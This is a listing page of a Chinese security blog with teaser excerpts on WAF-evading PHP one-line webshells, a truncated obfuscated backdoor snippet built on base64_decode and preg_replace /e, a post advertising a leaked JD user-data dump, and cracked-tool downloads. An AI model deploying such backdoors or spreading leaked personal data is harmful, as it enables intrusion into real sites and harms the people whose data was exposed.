漏洞人生
生存之道,安全之法,产品之术,代码之器
首页
WEB开发
Python
PHP
服务器
discuz
wordpress
在线工具
网络安全
渗透教程
渗透工具
互联网
产品/运营
SEO优化
SEO常识
SEO教程大全
网络运维
乌云drops
乌云zone
It’s Life
关于博主
给我留言
首页
菜单
SEO教程大全
网络运维
网络安全
网站建设
这就是生活
有问必答
关于我
网络安全
新鲜出炉的谷歌镜像站,来自于吃瓜群众的智慧
2016-12-12
安全事件
10521
2
继最新京东泄露12G的用户数据裤子下载分享【这集你肯定没看过!】之后。 两天过去了,瓜也差不多快吃完了, 大家奋不顾身探索京东12G的热情也稍微散去了些,现在回想起来也是心有余悸,那些个非死命找我要12G陆小凤传奇电影的瓜友,你们肿么了,搞得我也想下下来看看,生怕错过了什么。 …
继续阅读 »
互联网
最新京东泄露12G的用户数据裤子下载分享【这集你肯定没看过!】
2016-12-11
安全事件
,
社工库
124338
13
独家分享! 炸了,炸了!社工裤再次强大了一波! 这几天黑市上出现重磅“炸弹”,一个12G的数据包开始流通,其中包括用户名、密码、邮箱、QQ号、电话号码、身份证等多个维度,数据多达数千万条。 这12G的数据包,黑产再次被搅动。 一些地下渠道,开始对数据进行明码标价交易,价格从…
继续阅读 »
网络运维
vmware中linux系统误删除文件恢复神器【包括xfs】
2016-12-1
优秀工具
18546
0
linux中rm -rf xxx后一秒发现删除文件,那一刻是崩溃的,别问我今天经历了写什么,就是搞事情!!! 一般linux中可用的恢复软件是不多的,一开始我试了testdisk,但是苦于文件格式是xfs的,竟然不支持。 下载地址:http://www.cgsecurity.org/wiki/TestDisk_Download 然后想到vmware应该有单独的工具…
继续阅读 »
PHP
浅析一句话后门中eval与assert执行条件与原理
2016-11-22
PHP
,
后门
18756
2
eval与assert都算是元老级一句话后门函数,其实很多情形下代码的执行还是需要依靠eval去执行,只是前锋路转了而已。 eval与assert函数的用法大家可以自行百度。 eval与assert区别 eval函数中参数是字符,如: eval('echo 1;'); assert函数中参数为表达式 (或者为函数),如: assert(phpinfo()) assert(eval('ec…
继续阅读 »
渗透教程
php一句话后门过狗姿势万千之后门构造与隐藏【二】
2016-11-20
PHP
,
后门
10531
0
声明: 本文由博主首发于:阿里先知 https://xianzhi.aliyun.com/forum/read/441.html 如需要转载,请先联系先知技术社区授权;未经授权请勿转载。 上一篇:php一句话后门过狗姿势万千之理论篇【一】 第二章节主要带给大家一些后门构造思路,与安全狗文件特征检测的机制。 另外强调一下,这篇文章需…
继续阅读 »
渗透教程
php一句话后门过狗姿势万千之传输层加工【三】
2016-11-20
PHP
,
后门
8164
2
声明: 本文由博主首发于:阿里先知 https://xianzhi.aliyun.com/forum/read/442.html 如需要转载,请先联系先知技术社区授权;未经授权请勿转载。 先知技术社区投稿邮箱:Aliyun_xianzhi#service.alibaba.com 既然木马已就绪,那么想要利用木马,必然有一个数据传输的过程,数据提交是必须的,数据返回…
继续阅读 »
渗透教程
php一句话后门过狗姿势万千之理论篇【一】
2016-11-18
PHP
,
后门
8103
3
声明: 本文由博主首发于:阿里先知 https://xianzhi.aliyun.com/forum/read/441.html 如需要转载,请先联系先知技术社区授权;未经授权请勿转载。 写在前面: 过狗相关的资料网上也是有很多,所以在我接下来的文章中,可能观点或者举例可能会与网上部分雷同,或者表述不够全面。 但是我只能说,我…
继续阅读 »
这就是生活
论IT汪双十一剁手的正确姿势
2016-11-13
生活如此多娇
3894
0
双十一,没什么好说的,对这个具有中国现代主义特色的节日,可以总结为三个字,买买买。 对于双十一的商业与经济角度,不再做评价,知乎上的回答更有深度。 毕竟我只是一个平民,讨论那些个经济事态,国际化双十一,跟我有个什么卵关系(马云爸爸曾经也说过类似的大实话) 那么作为I…
继续阅读 »
渗透工具
渗透教程
php一句话后门过5大WAF无压力[安全狗+360网站卫士+护卫神+D盾]
2016-11-12
PHP
,
后门
44363
10
最近研究过狗一句话有点走火入魔,目前研究了几个版本的一句话,效果都还不错。 授之于鱼不如授之以渔,过几天准备从理论层,代码层,传输层写个过狗连载教程。 目前我使用的是cknife软件,类似于菜刀的开源软件,虽然还有不少bug,但高度自由修改,不用担心后门。我之所以没有用菜刀,…
继续阅读 »
渗透教程
php一句话后门的几种变形分析[preg_replace函数]
2016-11-8
PHP
,
后门
23005
19
今天偶然在土司看到一篇关于php后门的问题,让我联想到以前遇到过的一个一句话,共同点都是利用preg_replace中/e 修正符使replacement 参数当作 PHP 代码来执行。 先来看下原版代码 <?php $Base = "base6"."4"."_decod"."e"; $_clasc = $Base($_REQUEST['_exit']); $arr = array($Base($_POST['mcontent']) => '|.*|e',); @array_walk($arr, $_cla…
继续阅读 »
首页
上一页
1
2
3
4
5
6
7
8
9
10
11
下一页
末页
生活累,一小半源于生存,一大半源于攀比。
与我联系:
戳这里>>
搜索
热评文章
随机文章
最近更新
最新文章
2016-10-5
BurpSuite 1.7.11破解版下载【附多/新版本下载】
2016-11-5
Connectify Dispatch指定程序使用指定网卡[运维神器]
2014-3-25
网站备案流程_网站备案需要什么[简单明了解决备案各种问题]
2018-2-3
最新BurpSuite 1.7.32 破解版[注册机]下载【无后门版】
2016-11-8
php一句话后门的几种变形分析[preg_replace函数]
2016-10-24
CVE-2016-0799简单分析 - mrh
2016-10-24
BurpSuite插件开发指南之 Python 篇 - Her0in
2016-10-24
Head First FILE Stream Pointer Overflow - Ricter
2016-11-1
AppEngine安全测试思路
2016-10-24
你的指纹还安全吗? - BlackHat 2015 黑帽大会总结 day 2 - 蒸米
2018-10-15
最新版Gitlab 更改自带nginx 为自建nginx
2020-9-23
Gitlab 项目“通用“功能打开报错500解决方案
2020-3-5
云悉指纹内网版(离线版)发布
2019-8-5
Centos 7 中高版本 libstdc++.so.6下载地址(解决报错:version’GLIBCXX_3.4.20’)
2019-3-31
Mac 使用体验 - 世上只有两种电脑:苹果电脑和其他电脑
2020-9-23
Gitlab 项目“通用“功能打开报错500解决方案
2020-3-5
云悉指纹内网版(离线版)发布
2019-8-5
Centos 7 中高版本 libstdc++.so.6下载地址(解决报错:version’GLIBCXX_3.4.20’)
2019-3-31
Mac 使用体验 - 世上只有两种电脑:苹果电脑和其他电脑
2019-3-27
Redis Desktop Manager Mac版免编译安装包下载
最新评论
陆
邀请码
test
那个配置文件的路径在哪里啊
小山
支持
Big Tree
我和你一样的反应 😮
8848
666
热门标签
服务器
百度算法
互联网
优秀工具
合肥seo
外链
百度权重
网络营销
discuz
百度排名
搜索引擎
生活如此多娇
python模块
渗透神器
PHP
wordpress
网站运营
百度站长平台
linux工具
关键词
用户体验
网站结构
linux
后门
网站收录
域名
sql注入
抓包
wireshark
运维工具
用户需求
SEO设置
友情链接
云悉指纹
高蒙博客
最新评论
陆邀请码
test那个配置文件的路径在哪里啊
小山支持
Big Tree我和你一样的反应 😮
8848666